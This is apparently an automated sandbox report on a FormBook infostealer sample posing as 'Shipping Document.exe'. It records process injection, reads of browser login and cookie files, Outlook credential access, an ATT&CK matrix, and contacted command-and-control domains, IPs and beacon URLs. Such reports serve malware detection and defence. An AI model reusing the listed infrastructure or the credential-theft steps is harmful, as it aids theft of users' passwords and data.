Code function: 1_2_00FC3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

1_2_00FC3B4C

Source: C:\Users\user\Desktop\Shipping Document.exe

Code function: 1_2_00FC4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

1_2_00FC4A35

Source: C:\Users\user\Desktop\Shipping Document.exe

Code function: 1_2_01024F21 mouse_event,

1_2_01024F21

Source: C:\Users\user\Desktop\Shipping Document.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Shipping Document.exe"	Jump to behavior
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe	Process created: C:\Windows\SysWOW64\certreq.exe "C:\Windows\SysWOW64\certreq.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Shipping Document.exe

1_2_010181F7

Source: C:\Users\user\Desktop\Shipping Document.exe

Code function: 1_2_01024C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

1_2_01024C03

Source: Shipping Document.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Shipping Document.exe, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000003.00000000.1575167368.0000000001970000.00000002.00000001.00040000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000003.00000002.3983455529.0000000001971000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: tvtoHmZUTcBKRIVpHYXPXI.exe, 00000003.00000000.1575167368.0000000001970000.00000002.00000001.00040000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000003.00000002.3983455529.0000000001971000.00000002.00000001.00040000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000000.1743027988.0000000001890000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: tvtoHmZUTcBKRIVpHYXPXI.exe, 00000003.00000000.1575167368.0000000001970000.00000002.00000001.00040000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000003.00000002.3983455529.0000000001971000.00000002.00000001.00040000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000000.1743027988.0000000001890000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: ?Program Manager
Source: tvtoHmZUTcBKRIVpHYXPXI.exe, 00000003.00000000.1575167368.0000000001970000.00000002.00000001.00040000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000003.00000002.3983455529.0000000001971000.00000002.00000001.00040000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000000.1743027988.0000000001890000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\Shipping Document.exe

Code function: 1_2_00FE886B cpuid

1_2_00FE886B

Source: C:\Users\user\Desktop\Shipping Document.exe

Code function: 1_2_00FF50D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

1_2_00FF50D7

Source: C:\Users\user\Desktop\Shipping Document.exe

Code function: 1_2_01002230 GetUserNameW,

1_2_01002230

Source: C:\Users\user\Desktop\Shipping Document.exe

Code function: 1_2_00FF418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

1_2_00FF418A

Source: C:\Users\user\Desktop\Shipping Document.exe

Code function: 1_2_00FC4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

1_2_00FC4AFE

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.3984304736.0000000003650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1669970223.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3980970277.00000000033E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1670104693.00000000027B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3987001681.0000000005650000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3977610628.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3984522245.0000000005800000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1670907930.0000000005B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\certreq.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\certreq.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Source: Shipping Document.exe	Binary or memory string: WIN_81
Source: Shipping Document.exe	Binary or memory string: WIN_XP
Source: Shipping Document.exe	Binary or memory string: WIN_XPe
Source: Shipping Document.exe	Binary or memory string: WIN_VISTA
Source: Shipping Document.exe	Binary or memory string: WIN_7
Source: Shipping Document.exe	Binary or memory string: WIN_8
Source: Shipping Document.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.3984304736.0000000003650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1669970223.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3980970277.00000000033E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1670104693.00000000027B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3987001681.0000000005650000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3977610628.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3984522245.0000000005800000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1670907930.0000000005B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\Shipping Document.exe	Code function: 1_2_01036596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		1_2_01036596
Source: C:\Users\user\Desktop\Shipping Document.exe	Code function: 1_2_01036A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		1_2_01036A5A

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	2 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Valid Accounts	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	2 Valid Accounts	3 Obfuscated Files or Information	NTDS	16 System Information Discovery	Distributed Component Object Model	21 Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 DLL Side-Loading	LSA Secrets	51 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	412 Process Injection	2 Valid Accounts	Cached Domain Credentials	2 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Virtualization/Sandbox Evasion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	412 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Shipping Document.exe	54%	ReversingLabs	Win32.Trojan.Strab
Shipping Document.exe	37%	Virustotal		Browse
Shipping Document.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Link
www.gamemaster.at	0%	Virustotal	Browse
www.annahaywardva.co.uk	0%	Virustotal	Browse
www.busypro.net	0%	Virustotal	Browse
www.fruitique.co.uk	1%	Virustotal	Browse
pricekaboom.com	4%	Virustotal	Browse
autonomyai.xyz	2%	Virustotal	Browse
www.swordshoop.ca	0%	Virustotal	Browse
www.ziontool.xyz	1%	Virustotal	Browse
ghs.googlehosted.com	0%	Virustotal	Browse
www.autonomyai.xyz	2%	Virustotal	Browse
www.auronhouse.com	8%	Virustotal	Browse
ukscan.co.uk	1%	Virustotal	Browse
www.ukscan.co.uk	0%	Virustotal	Browse
www.drapples.club	1%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
https://duckduckgo.com/chrome_newtab	0%	Avira URL Cloud	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Avira URL Cloud	safe
http://www.performacetoyota.ca/opfh/	0%	Avira URL Cloud	safe
https://s3-us-west-2.amazonaws.com/s.cdpn.io/16327/MorphSVGPlugin.min.js	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Avira URL Cloud	safe
https://s3-us-west-2.amazonaws.com/s.cdpn.io/16327/SplitText.min.js	0%	Avira URL Cloud	safe
http://www.performacetoyota.ca/opfh/	0%	Virustotal		Browse
https://duckduckgo.com/ac/?q=	0%	Virustotal		Browse
https://duckduckgo.com/chrome_newtab	0%	Virustotal		Browse
https://s3-us-west-2.amazonaws.com/s.cdpn.io/16327/SplitText.min.js	0%	Virustotal		Browse
http://www.auronhouse.com/opfh/	12%	Virustotal		Browse
http://www.auronhouse.com/opfh/	100%	Avira URL Cloud	malware
https://login.microsoftonline.com/%s/oauth2/authorizeStringCchPrintfWhttps://login.microsoftonline.c	0%	Virustotal		Browse
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Virustotal		Browse
https://login.microsoftonline.com/%s/oauth2/authorizeStringCchPrintfWhttps://login.microsoftonline.c	0%	Avira URL Cloud	safe
http://www.swordshoop.ca/opfh/	0%	Avira URL Cloud	safe
http://www.busypro.net/opfh/	0%	Avira URL Cloud	safe
http://www.y94hr.top/opfh/	0%	Avira URL Cloud	safe
https://s3-us-west-2.amazonaws.com/s.cdpn.io/16327/MorphSVGPlugin.min.js	0%	Virustotal		Browse
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Avira URL Cloud	safe
https://www.fasthosts.co.uk/domain-names/search/?domain=$	0%	Avira URL Cloud	safe
http://www.pharmacielorraine.fr/opfh/?R40L6=FpNucvzIjWOmZMmiXb56c6bY69+Kb+n3d8h+TlHEUGgG180M1/D8mOTG6mRn1YM4wyonPK4hNo3l6hpm9fEjrGx3GgV25NLdT3AKPeddSoL4M+kWNe1Dr4885y6woZHnwBfR8wPvVVyX&b2PX=hZXl7VFPKl04	0%	Avira URL Cloud	safe
http://www.drapples.club/opfh/	100%	Avira URL Cloud	phishing
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Virustotal		Browse
http://www.swordshoop.ca/opfh/	2%	Virustotal		Browse
http://www.pharmacielorraine.fr/opfh/	0%	Avira URL Cloud	safe
http://www.auronhouse.com/opfh/?R40L6=7Wua4PKYKhchrV0dSktA0JoUSva1JJLdwMIZklFmHGZRtcxczCNUWysLgxYx/pnfXqYHMYy3waVzlkYFJZPX15RsNLA3Qz23CQiAilW87ptstt/8e1muReOX5esxW5+HpDKanOvxLVS9&b2PX=hZXl7VFPKl04	100%	Avira URL Cloud	malware
http://www.ukscan.co.uk/opfh/?R40L6=psz/lQNJHky0FOXgYDlRBO31u/UTIg5Z7J5/vGqoP1XE+s8tr2C67qXiCqgsbd7PhBjn/lOTwSnvTpIgb8gb5UyiwGIV81pY4xefKgdN39cek8LArgSLQN3X1wfTB8wzGIcdBGhl9zAd&b2PX=hZXl7VFPKl04	100%	Avira URL Cloud	malware
https://www.fasthosts.co.uk/domain-names/search/?domain=$	0%	Virustotal		Browse
https://cdnjs.cloudflare.com/ajax/libs/gsap/1.20.2/TweenMax.min.js	0%	Avira URL Cloud	safe
http://www.ukscan.co.uk/opfh/	100%	Avira URL Cloud	malware
http://www.pricekaboom.com/opfh/	100%	Avira URL Cloud	malware
http://www.gamemaster.at/opfh/?R40L6=PC685LTb06jHOCK4vGHbFQZ2xkI1XLFU2OtxALHCeHx3vCzda7v1dhtYxdz770kbIy0AX5udiNTwR8fzRWvU0kdzv6lB2tOiWMAiJN+HcPhB483U4R/s/Re5ANHairphm1/7Mj/vaUsb&b2PX=hZXl7VFPKl04	0%	Avira URL Cloud	safe
http://www.ziontool.xyz/opfh/	0%	Avira URL Cloud	safe
http://www.pricekaboom.com/opfh/?R40L6=i+7S41wOBsHRtkSR5z49LNLl1g14jCJSsH67VhPHZINUfWrbgsYvxB6MwE8qgxdKQETWoz01bCGz4LwvUs/3BJoUBrhuAwUbkATTebp7Ts+JQM1y8oWpV0wDLMDnSIORGtRyV6PjEdP1&b2PX=hZXl7VFPKl04	100%	Avira URL Cloud	malware
https://www.google.com	0%	Avira URL Cloud	safe
https://www.auronhouse.com/opfh/?R40L6=7Wua4PKYKhchrV0dSktA0JoUSva1JJLdwMIZklFmHGZRtcxczCNUWysLgxYx/	100%	Avira URL Cloud	malware
http://www.y94hr.top/opfh/?R40L6=+MQIh7XosrcV1YUvfmXLRZp9qVlVCaTixn9Z4SHGNrQWXqYuOwa/VK9HsnlVTmeIhuhJsBbQG3swuyVkvGLKXJd4NOCZwBpwFucJm+lE/1jiLpvFuFHXohi2H4hODzVegRzQFrQhMICC&b2PX=hZXl7VFPKl04	0%	Avira URL Cloud	safe
http://www.y94hr.top	0%	Avira URL Cloud	safe
http://www.busypro.net/opfh/	0%	Virustotal		Browse
https://fasthosts.co.uk/	0%	Avira URL Cloud	safe
http://www.batchscraper.com/opfh/?R40L6=AGl44rzTw2dIC+2fJHSMY5CagqpMx9ss+xDw2ILHnY0V4XytCPUwKd/QF5kiL9X2gIgUWxZ6E+yGLjvXAstM4MAyIKs/O1HO2djzFZ+svgnMXhmr1Gwb4CXwLPvvhByMEXNfrkehm32q&b2PX=hZXl7VFPKl04	100%	Avira URL Cloud	malware
http://www.autonomyai.xyz/opfh/	0%	Avira URL Cloud	safe
http://www.busypro.net/opfh/?R40L6=wk5WmycUod9Ch4sGNMfw6PGGK537NvyqKve97Rqxx64bZj5Y6/ZXBsSfuT6LL9ibplMzreLTp4ANFGROZWA3htlR8tjUt25lxV/kg4OrCh2epctFiYjQQV8YBu8QEUXGE65qscSGJJfb&b2PX=hZXl7VFPKl04	0%	Avira URL Cloud	safe
https://www.fasthosts.co.uk/get-online?utm_source=domainparking&utm_medium=referral&utm_campaign=fh_	0%	Avira URL Cloud	safe
http://www.performacetoyota.ca/opfh/?R40L6=i4up9kvrIhZylhTl+TGF8NSB39il2c4qnhHhVcZTirCO4e+BACowf4KjePAiAuddepejX0cVJHKGxf87gLVZ3yhxJ+t5gkh7Sx8ygwwh5CFsGAn8/fc7zcPpOBOJ0Z4qUeJ8jZdFyiV9&b2PX=hZXl7VFPKl04	0%	Avira URL Cloud	safe
http://www.fruitique.co.uk/opfh/	0%	Avira URL Cloud	safe
http://www.annahaywardva.co.uk/opfh/?R40L6=rBeI5JL4SdE8nFW9pIUfBkvOLwnHMU9O9JCyLdspFwofGsVtAi0tgWeg3zHJ2XnwxoW6lgl8FdELwhlchXf8iZDZl79NZT9hgeyhr+mr8upFSzDJKwHDStxLaliRPfjpA6FezmrpjIYZ&b2PX=hZXl7VFPKl04	100%	Avira URL Cloud	malware
http://www.annahaywardva.co.uk/opfh/	100%	Avira URL Cloud	malware
https://static.fasthosts.co.uk/icons/favicon.ico	0%	Avira URL Cloud	safe
https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css	0%	Avira URL Cloud	safe
http://www.ziontool.xyz/opfh/?R40L6=YUsgxJYlBZRF0No39lc3JbqbmV5Q7LZCTky4dVHopuN0Ho35s4wXwSWKkFKDUjWggieTnElUH3EcFS8A7QGjP8jAu/34q2WYLtH3kt2+sJ07P+s7RD70L6colfRzV4eR9N3BYmYWcCpx&b2PX=hZXl7VFPKl04	0%	Avira URL Cloud	safe
http://www.drapples.club/opfh/?R40L6=ItiWO1iWeFtHa8hPek+OcHyLbef7ZgLT8jCYd//+XcZZdI8PxrJa9smp+DWZYnBxcEEGiLIUcWsNzCqVKSWt292FhOiPAibVi2DXZfZ1Bcb5xD1zZxmn+AopE2U6Sy6WzAqAlkUlqKwq&b2PX=hZXl7VFPKl04	100%	Avira URL Cloud	phishing
http://www.gamemaster.at/opfh/	0%	Avira URL Cloud	safe
https://www.fasthosts.co.uk/contact?utm_source=domainparking&utm_medium=referral&utm_campaign=fh_par	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.pharmacielorraine.fr	91.195.240.92	true	true		unknown
www.gamemaster.at	199.59.243.225	true	true	0%, Virustotal, Browse	unknown
www.annahaywardva.co.uk	213.171.195.105	true	true	0%, Virustotal, Browse	unknown
www.busypro.net	160.251.148.118	true	true	0%, Virustotal, Browse	unknown
www.fruitique.co.uk	212.227.172.253	true	true	1%, Virustotal, Browse	unknown
pricekaboom.com	185.31.240.240	true	true	4%, Virustotal, Browse	unknown
autonomyai.xyz	3.33.130.190	true	true	2%, Virustotal, Browse	unknown
www.performacetoyota.ca	199.59.243.225	true	true		unknown
y94hr.top	38.47.207.149	true	true		unknown
94950.bodis.com	199.59.243.225	true	true		unknown
www.swordshoop.ca	199.59.243.225	true	true	0%, Virustotal, Browse	unknown
www.ziontool.xyz	203.161.43.227	true	true	1%, Virustotal, Browse	unknown
www.batchscraper.com	172.67.190.203	true	true		unknown
ghs.googlehosted.com	142.250.186.51	true	false	0%, Virustotal, Browse	unknown
ukscan.co.uk	3.33.130.190	true	true	1%, Virustotal, Browse	unknown
www.autonomyai.xyz	unknown	unknown	true	2%, Virustotal, Browse	unknown
www.auronhouse.com	unknown	unknown	true	8%, Virustotal, Browse	unknown
www.pricekaboom.com	unknown	unknown	true		unknown
www.digishieldu.online	unknown	unknown	true		unknown
www.ukscan.co.uk	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.drapples.club	unknown	unknown	true	1%, Virustotal, Browse	unknown
www.y94hr.top	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.performacetoyota.ca/opfh/	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.auronhouse.com/opfh/	false	12%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://www.busypro.net/opfh/	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.swordshoop.ca/opfh/	true	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.y94hr.top/opfh/	true	Avira URL Cloud: safe	unknown
http://www.pharmacielorraine.fr/opfh/?R40L6=FpNucvzIjWOmZMmiXb56c6bY69+Kb+n3d8h+TlHEUGgG180M1/D8mOTG6mRn1YM4wyonPK4hNo3l6hpm9fEjrGx3GgV25NLdT3AKPeddSoL4M+kWNe1Dr4885y6woZHnwBfR8wPvVVyX&b2PX=hZXl7VFPKl04	true	Avira URL Cloud: safe	unknown
http://www.drapples.club/opfh/	true	Avira URL Cloud: phishing	unknown
http://www.pharmacielorraine.fr/opfh/	true	Avira URL Cloud: safe	unknown
http://www.ukscan.co.uk/opfh/?R40L6=psz/lQNJHky0FOXgYDlRBO31u/UTIg5Z7J5/vGqoP1XE+s8tr2C67qXiCqgsbd7PhBjn/lOTwSnvTpIgb8gb5UyiwGIV81pY4xefKgdN39cek8LArgSLQN3X1wfTB8wzGIcdBGhl9zAd&b2PX=hZXl7VFPKl04	true	Avira URL Cloud: malware	unknown
http://www.auronhouse.com/opfh/?R40L6=7Wua4PKYKhchrV0dSktA0JoUSva1JJLdwMIZklFmHGZRtcxczCNUWysLgxYx/pnfXqYHMYy3waVzlkYFJZPX15RsNLA3Qz23CQiAilW87ptstt/8e1muReOX5esxW5+HpDKanOvxLVS9&b2PX=hZXl7VFPKl04	false	Avira URL Cloud: malware	unknown
http://www.ukscan.co.uk/opfh/	true	Avira URL Cloud: malware	unknown
http://www.pricekaboom.com/opfh/	true	Avira URL Cloud: malware	unknown
http://www.gamemaster.at/opfh/?R40L6=PC685LTb06jHOCK4vGHbFQZ2xkI1XLFU2OtxALHCeHx3vCzda7v1dhtYxdz770kbIy0AX5udiNTwR8fzRWvU0kdzv6lB2tOiWMAiJN+HcPhB483U4R/s/Re5ANHairphm1/7Mj/vaUsb&b2PX=hZXl7VFPKl04	true	Avira URL Cloud: safe	unknown
http://www.ziontool.xyz/opfh/	true	Avira URL Cloud: safe	unknown
http://www.pricekaboom.com/opfh/?R40L6=i+7S41wOBsHRtkSR5z49LNLl1g14jCJSsH67VhPHZINUfWrbgsYvxB6MwE8qgxdKQETWoz01bCGz4LwvUs/3BJoUBrhuAwUbkATTebp7Ts+JQM1y8oWpV0wDLMDnSIORGtRyV6PjEdP1&b2PX=hZXl7VFPKl04	true	Avira URL Cloud: malware	unknown
http://www.y94hr.top/opfh/?R40L6=+MQIh7XosrcV1YUvfmXLRZp9qVlVCaTixn9Z4SHGNrQWXqYuOwa/VK9HsnlVTmeIhuhJsBbQG3swuyVkvGLKXJd4NOCZwBpwFucJm+lE/1jiLpvFuFHXohi2H4hODzVegRzQFrQhMICC&b2PX=hZXl7VFPKl04	true	Avira URL Cloud: safe	unknown
http://www.batchscraper.com/opfh/?R40L6=AGl44rzTw2dIC+2fJHSMY5CagqpMx9ss+xDw2ILHnY0V4XytCPUwKd/QF5kiL9X2gIgUWxZ6E+yGLjvXAstM4MAyIKs/O1HO2djzFZ+svgnMXhmr1Gwb4CXwLPvvhByMEXNfrkehm32q&b2PX=hZXl7VFPKl04	true	Avira URL Cloud: malware	unknown
http://www.autonomyai.xyz/opfh/	true	Avira URL Cloud: safe	unknown
http://www.busypro.net/opfh/?R40L6=wk5WmycUod9Ch4sGNMfw6PGGK537NvyqKve97Rqxx64bZj5Y6/ZXBsSfuT6LL9ibplMzreLTp4ANFGROZWA3htlR8tjUt25lxV/kg4OrCh2epctFiYjQQV8YBu8QEUXGE65qscSGJJfb&b2PX=hZXl7VFPKl04	true	Avira URL Cloud: safe	unknown
http://www.performacetoyota.ca/opfh/?R40L6=i4up9kvrIhZylhTl+TGF8NSB39il2c4qnhHhVcZTirCO4e+BACowf4KjePAiAuddepejX0cVJHKGxf87gLVZ3yhxJ+t5gkh7Sx8ygwwh5CFsGAn8/fc7zcPpOBOJ0Z4qUeJ8jZdFyiV9&b2PX=hZXl7VFPKl04	true	Avira URL Cloud: safe	unknown
http://www.fruitique.co.uk/opfh/	true	Avira URL Cloud: safe	unknown
http://www.annahaywardva.co.uk/opfh/?R40L6=rBeI5JL4SdE8nFW9pIUfBkvOLwnHMU9O9JCyLdspFwofGsVtAi0tgWeg3zHJ2XnwxoW6lgl8FdELwhlchXf8iZDZl79NZT9hgeyhr+mr8upFSzDJKwHDStxLaliRPfjpA6FezmrpjIYZ&b2PX=hZXl7VFPKl04	true	Avira URL Cloud: malware	unknown
http://www.annahaywardva.co.uk/opfh/	true	Avira URL Cloud: malware	unknown
http://www.ziontool.xyz/opfh/?R40L6=YUsgxJYlBZRF0No39lc3JbqbmV5Q7LZCTky4dVHopuN0Ho35s4wXwSWKkFKDUjWggieTnElUH3EcFS8A7QGjP8jAu/34q2WYLtH3kt2+sJ07P+s7RD70L6colfRzV4eR9N3BYmYWcCpx&b2PX=hZXl7VFPKl04	true	Avira URL Cloud: safe	unknown
http://www.drapples.club/opfh/?R40L6=ItiWO1iWeFtHa8hPek+OcHyLbef7ZgLT8jCYd//+XcZZdI8PxrJa9smp+DWZYnBxcEEGiLIUcWsNzCqVKSWt292FhOiPAibVi2DXZfZ1Bcb5xD1zZxmn+AopE2U6Sy6WzAqAlkUlqKwq&b2PX=hZXl7VFPKl04	true	Avira URL Cloud: phishing	unknown
http://www.gamemaster.at/opfh/	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	certreq.exe, 00000004.00000003.1865083289.000000000867D000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
